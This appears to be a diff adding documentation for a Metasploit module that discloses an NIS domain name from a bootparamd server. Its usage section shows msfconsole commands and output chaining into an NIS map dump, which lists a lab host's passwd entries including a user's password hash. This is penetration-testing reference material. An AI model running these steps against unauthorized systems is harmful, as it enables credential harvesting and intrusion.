|
| 1 | +## Intro |
| 2 | + |
| 3 | +From the `bootparamd(8)` man page: |
| 4 | + |
| 5 | +> bootparamd is a server process that provides information to diskless clients necessary for booting. It consults the /etc/bootparams file to find the information it needs. |
| 6 | +
|
| 7 | +The module documented within will allow a tester to disclose the NIS |
| 8 | +domain name from a server running `bootparamd`. After knowing the domain |
| 9 | +name, the tester can follow up with `auxiliary/gather/nis_ypserv_map` to |
| 10 | +dump a map from an NIS server (running as `ypserv`). |
| 11 | + |
| 12 | +## Setup |
| 13 | + |
| 14 | +Set up NIS as per <https://help.ubuntu.com/community/SettingUpNISHowTo>. |
| 15 | +If the link is down, you can find it via the Wayback Machine. |
| 16 | + |
| 17 | +After that is done, install `bootparamd` however your OS provides it. |
| 18 | + |
| 19 | +Make sure you add a client to the `bootparams` file, which is usually at |
| 20 | +`/etc/bootparams`. The client should be added to `/etc/hosts` if it |
| 21 | +isn't already resolvable. |
| 22 | + |
| 23 | +## Options |
| 24 | + |
| 25 | +**PROTOCOL** |
| 26 | + |
| 27 | +Set this to either TCP or UDP. UDP is the default due to `bootparamd`. |
| 28 | + |
| 29 | +**CLIENT** |
| 30 | + |
| 31 | +Set this to the address of a client in the target's `bootparams` file. |
| 32 | +Usually this is a host within the same network range as the target. |
| 33 | + |
| 34 | +**XDRTimeout** |
| 35 | + |
| 36 | +Set this to the timeout in seconds for XDR decoding of the response. |
| 37 | + |
| 38 | +## Usage |
| 39 | + |
| 40 | +``` |
| 41 | +msf > use auxiliary/gather/nis_bootparamd_domain |
| 42 | +msf auxiliary(gather/nis_bootparamd_domain) > set rhost 192.168.33.10 |
| 43 | +rhost => 192.168.33.10 |
| 44 | +msf auxiliary(gather/nis_bootparamd_domain) > set client 192.168.33.10 |
| 45 | +client => 192.168.33.10 |
| 46 | +msf auxiliary(gather/nis_bootparamd_domain) > run |
| 47 | +
|
| 48 | +[+] 192.168.33.10:111 - NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft |
| 49 | +[*] Auxiliary module execution completed |
| 50 | +msf auxiliary(gather/nis_bootparamd_domain) > |
| 51 | +``` |
| 52 | + |
| 53 | +After disclosing the domain name, you can use |
| 54 | +`auxiliary/gather/nis_ypserv_map` to dump a map from an NIS server. |
| 55 | + |
| 56 | +``` |
| 57 | +msf auxiliary(gather/nis_bootparamd_domain) > use auxiliary/gather/nis_ypserv_map |
| 58 | +msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.33.10 |
| 59 | +rhost => 192.168.33.10 |
| 60 | +msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft |
| 61 | +domain => gesellschaft |
| 62 | +msf auxiliary(gather/nis_ypserv_map) > run |
| 63 | +
|
| 64 | +[+] 192.168.33.10:111 - Dumping map passwd.byname on domain gesellschaft: |
| 65 | +list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin |
| 66 | +ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash |
| 67 | +games:*:5:60:games:/usr/games:/usr/sbin/nologin |
| 68 | +news:*:9:9:news:/var/spool/news:/usr/sbin/nologin |
| 69 | +lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin |
| 70 | +sys:*:3:3:sys:/dev:/usr/sbin/nologin |
| 71 | +backup:*:34:34:backup:/var/backups:/usr/sbin/nologin |
| 72 | +uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin |
| 73 | +systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false |
| 74 | +man:*:6:12:man:/var/cache/man:/usr/sbin/nologin |
| 75 | +bin:*:2:2:bin:/bin:/usr/sbin/nologin |
| 76 | +gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin |
| 77 | +sync:*:4:65534:sync:/bin:/bin/sync |
| 78 | +systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false |
| 79 | +uuidd:*:108:112::/run/uuidd:/bin/false |
| 80 | +dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false |
| 81 | +root:*:0:0:root:/root:/bin/bash |
| 82 | +sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin |
| 83 | +systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false |
| 84 | +irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin |
| 85 | +messagebus:*:107:111::/var/run/dbus:/bin/false |
| 86 | +_apt:*:105:65534::/nonexistent:/bin/false |
| 87 | +mail:*:8:8:mail:/var/mail:/usr/sbin/nologin |
| 88 | +syslog:*:104:108::/home/syslog:/bin/false |
| 89 | +daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin |
| 90 | +systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false |
| 91 | +pollinate:*:111:1::/var/cache/pollinate:/bin/false |
| 92 | +www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin |
| 93 | +proxy:*:13:13:proxy:/bin:/usr/sbin/nologin |
| 94 | +lxd:*:106:65534::/var/lib/lxd/:/bin/false |
| 95 | +
|
| 96 | +[*] Auxiliary module execution completed |
| 97 | +msf auxiliary(gather/nis_ypserv_map) > |
| 98 | +``` |
0 commit comments